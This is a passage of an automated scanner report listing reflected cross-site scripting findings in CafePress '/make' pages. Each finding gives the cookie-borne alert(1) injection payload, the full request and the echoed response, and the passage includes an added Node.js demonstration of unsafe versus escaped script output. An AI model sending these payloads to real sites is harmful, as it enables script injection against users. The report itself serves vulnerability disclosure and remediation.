HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58850 Date: Sun, 26 Dec 2010 13:48:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'bca4a</script><script>alert(1)</script>d8d616836de ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-invitations
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671b"-alert(1)-"c603f1ee3b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 55553 Date: Sun, 26 Dec 2010 13:47:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55553 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-invitations
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c12</script><script>alert(1)</script>767fea4e030 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=22c12</script><script>alert(1)</script>767fea4e030 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 55575 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '22c12</script><script>alert(1)</script>767fea4e030 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 744de"-alert(1)-"d438f72d6bc was submitted in the cp-v cookie and was echoed unmodified in the application's response. The embedded double quote closes the string literal, and the subtraction operators on either side of alert(1) keep the statement syntactically valid (the assignment becomes s.eVar30 = "...744de" - alert(1) - "d438f72d6bc ";), so the injected call runs when the inline script executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp-v cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58754 Date: Sun, 26 Dec 2010 13:47:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
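The Issue detail and Remediation detail paragraphs above (repeated verbatim for every cp-v and cp_st finding in this report) describe two payload shapes and recommend escaping values before they are written into a script block. The following Node.js example is added here by the editor; it is not CafePress code and not scanner output. It rebuilds the two inline-script assignments seen in the responses (s.eVar30 and window.cafepress.tealeaf.searchTerm, simplified to local objects), first with raw interpolation and then through a JavaScript-string-context encoder, and executes the result with a stub alert() to show that the encoded version keeps the cookie value as data without running it. The two payload constants are copied from the report; the template, encoder, execution stub and function names are assumptions of this example.

```javascript
// Added example, not CafePress code: emitting cookie values into an inline
// <script> block the way the report's responses do, unsafely and then safely.
'use strict';

// Payloads copied from the report (cp-v and cp_st findings). The first closes
// a double-quoted string and rides the subtraction operator; the second ends
// the <script> element outright, which works whatever quoting surrounds it.
const CPV_PAYLOAD = 'D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc ';
const CPST_PAYLOAD = "acf95</script><script>alert(1)</script>565909414f4 ";

// Markup template shared by both emitters (simplified from the responses: the
// real page assigns to window.cafepress.tealeaf; local objects are used here).
function renderScript(cpvText, cpstText) {
  return '<script>\n' +
    'var s = {}; var tealeaf = {};\n' +
    's.eVar30 = "' + cpvText + '";\n' +
    "tealeaf.searchTerm = '" + cpstText + "';\n" +
    '</script>';
}

// Vulnerable emitter: raw interpolation, as the report's responses show.
function emitUnsafe(cpv, cpst) {
  return renderScript(cpv, cpst);
}

// JavaScript-string-context encoder: every character outside [A-Za-z0-9]
// becomes \xHH (or \uHHHH above U+00FF). Quotes, backslash, <, /, >, newlines
// and U+2028/2029 are all covered, so neither a string delimiter nor the
// sequence "</script" can be rebuilt from the data.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code <= 0xff
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened emitter: same markup, values passed through the encoder first.
function emitSafe(cpv, cpst) {
  return renderScript(jsStringEncode(cpv), jsStringEncode(cpst));
}

// The HTML tokenizer ends a <script> element at the first "</script" it sees,
// regardless of JavaScript quoting. True means the data terminated the block.
function hasEarlyScriptClose(html) {
  const inner = html.slice('<script>'.length, html.length - '</script>'.length);
  return /<\/script/i.test(inner);
}

// Executes the block body with alert() replaced by a recorder, approximating
// what the browser would run if the markup reached it intact. Returns the
// assigned values and the number of alert() calls; a parse error is reported.
function runScriptBlock(html) {
  const body = html.slice('<script>\n'.length, html.length - '\n</script>'.length);
  const alerts = [];
  try {
    const fn = new Function('alert',
      body + '\nreturn { eVar30: s.eVar30, searchTerm: tealeaf.searchTerm };');
    const values = fn((x) => alerts.push(x));
    return { ok: true, alerts: alerts.length, ...values };
  } catch (err) {
    return { ok: false, alerts: alerts.length, error: err.name };
  }
}

// Side-by-side result for the two emitters.
function demo() {
  return {
    unsafeCpv: runScriptBlock(emitUnsafe(CPV_PAYLOAD, '')),
    unsafeCpstTerminatesBlock: hasEarlyScriptClose(emitUnsafe('', CPST_PAYLOAD)),
    safe: runScriptBlock(emitSafe(CPV_PAYLOAD, CPST_PAYLOAD)),
    safeTerminatesBlock: hasEarlyScriptClose(emitSafe('', CPST_PAYLOAD)),
  };
}

console.log(demo());
```

Note that the cp_st payload is a valid JavaScript string literal on its own, so executing the unsafe block in isolation never calls alert(); it is the HTML tokenizer's treatment of </script inside the element that makes it exploitable, which is why hasEarlyScriptClose() inspects the emitted markup instead of evaluating it.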
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload acf95</script><script>alert(1)</script>565909414f4 was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> it encounters, irrespective of JavaScript quoting, so the <script>alert(1)</script> that follows is parsed as a new script element and executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp_st cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=acf95</script><script>alert(1)</script>565909414f4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58776 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58776 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'acf95</script><script>alert(1)</script>565909414f4 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-gifts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload c29af"-alert(1)-"a5c8b14505 was submitted in the cp-v cookie and was echoed unmodified in the application's response. The embedded double quote closes the string literal, and the subtraction operators on either side of alert(1) keep the statement syntactically valid (the assignment becomes s.eVar30 = "...c29af" - alert(1) - "a5c8b14505 ";), so the injected call runs when the inline script executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp-v cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 